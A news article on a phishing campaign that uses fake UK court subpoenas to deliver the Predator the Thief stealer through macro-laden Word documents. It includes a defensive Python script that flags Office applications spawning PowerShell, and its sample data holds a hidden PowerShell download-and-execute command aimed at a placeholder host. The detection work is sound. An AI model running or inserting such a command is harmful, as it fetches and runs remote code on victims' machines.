Fake court summons used to spread phishing malware


Cybersecurity firm Cofense has discovered a new phishing campaign that uses a subpoena-themed email, purporting to come from the UK Ministry of Justice, to infect recipients' systems with information-stealing malware.

Employees at insurance and retail companies have received the emails, which state that the recipient has been subpoenaed and must click a link in the message to see the details of their case.

The link abuses trusted services, Google Docs and Microsoft OneDrive, to host the infection chain. The Google Docs page itself is not malicious, but it starts a redirect chain that eventually leads to a Microsoft Word document laden with malicious macros. If the recipient opens the document and enables its macros, the macro code uses PowerShell to download a sample of the Predator the Thief information stealer.
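The hand-off from a Word macro to PowerShell is the stage of that chain a defender can most reliably catch in process-creation telemetry. The following Python is an added example, not code from Cofense or from this article: it triages constructed, flattened Sysmon-style process-creation records and flags an Office application spawning a script host, rating the hit higher when the command line also carries a download cradle or evasion flags. The record format, field names, indicator lists and sample command lines are assumptions made for illustration.

```python
import re
from dataclasses import dataclass

# Parent/child pairs of interest: an Office application handing off to a
# script host is the hallmark of the macro stage described above.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Common PowerShell download-cradle and evasion markers (illustrative, not exhaustive).
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|https?://",
    re.IGNORECASE)
EVASION_FLAGS = re.compile(
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|-noni\b|executionpolicy\s+bypass",
    re.IGNORECASE)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'Key: value|Key: value' record, a flattened stand-in
    for a Sysmon Event ID 1 (process creation). Real deployments read EVTX/XML."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return ProcEvent(fields.get("ParentImage", ""), fields.get("Image", ""),
                     fields.get("CommandLine", ""))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcEvent) -> list:
    """Return the reasons this event is suspicious (empty list if it is not).
    Only Office-spawned script hosts are scored, so an administrator running a
    download from an interactive shell does not trigger an alert."""
    reasons = []
    if basename(ev.parent_image) in OFFICE_APPS and basename(ev.image) in SCRIPT_HOSTS:
        reasons.append("office app spawned script host")
        if DOWNLOAD_CRADLE.search(ev.command_line):
            reasons.append("download cradle in command line")
        if EVASION_FLAGS.search(ev.command_line):
            reasons.append("evasion flags in command line")
    return reasons


def triage(lines) -> list:
    """Run every record through score_event and return the alerts in order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if not reasons:
            continue
        severity = "high" if len(reasons) > 1 else "medium"
        alerts.append({"image": basename(ev.image), "severity": severity, "reasons": reasons})
    return alerts


# Constructed sample records; none of these are real observed command lines.
SAMPLE_EVENTS = [
    # 1: Word spawning a hidden PowerShell download cradle (the pattern in the campaign above)
    r"ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine: powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')",
    # 2: an administrator fetching a file from an interactive shell: not an Office child, no alert
    r"ParentImage: C:\Windows\explorer.exe"
    r"|Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine: powershell -c Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip",
    # 3: Word launching its print helper: benign child process, no alert
    r"ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|Image: C:\Windows\splwow64.exe|CommandLine: C:\Windows\splwow64.exe 12288",
    # 4: Excel spawning cmd.exe with no download indicators: still worth a look
    r"ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
    r"|Image: C:\Windows\System32\cmd.exe|CommandLine: cmd /c dir",
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["severity"], alert["image"], "; ".join(alert["reasons"]))
```

Run as-is, the script reports record 1 as high and record 4 as medium and stays silent on the other two. The parent-process check carries the weight here: command-line markers alone are noisy, but an Office application starting PowerShell or cmd.exe is rare enough in most environments to be worth a ticket every time.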

The email also warns that the recipient has 14 days to comply with the subpoena, a scare tactic designed to pressure users into clicking the link before they think about it.

Predator the Thief

Predator the Thief has the basic capabilities of most information stealers. What sets it apart is the wide range of web browsers it targets, which means even users of less popular browsers can be affected.

The malware's authors distribute it through a Telegram channel, which also doubles as a customer support channel.

Predator the Thief targets cryptocurrency wallets, browser data, and FTP and email credentials. It also takes a screenshot of the infected machine, and the collected data is sent back to a command and control (C2) server via an HTTP POST request.

Once the data has been gathered and sent to the C2, the binary cleans up parts of the infection and terminates itself, which makes the compromise much harder to discover after the fact.

To avoid falling victim to this campaign, Cofense recommends disabling Office macros by default, so that the Word document cannot run its payload even if opened, and deploying endpoint protection.

Anthony Spadafora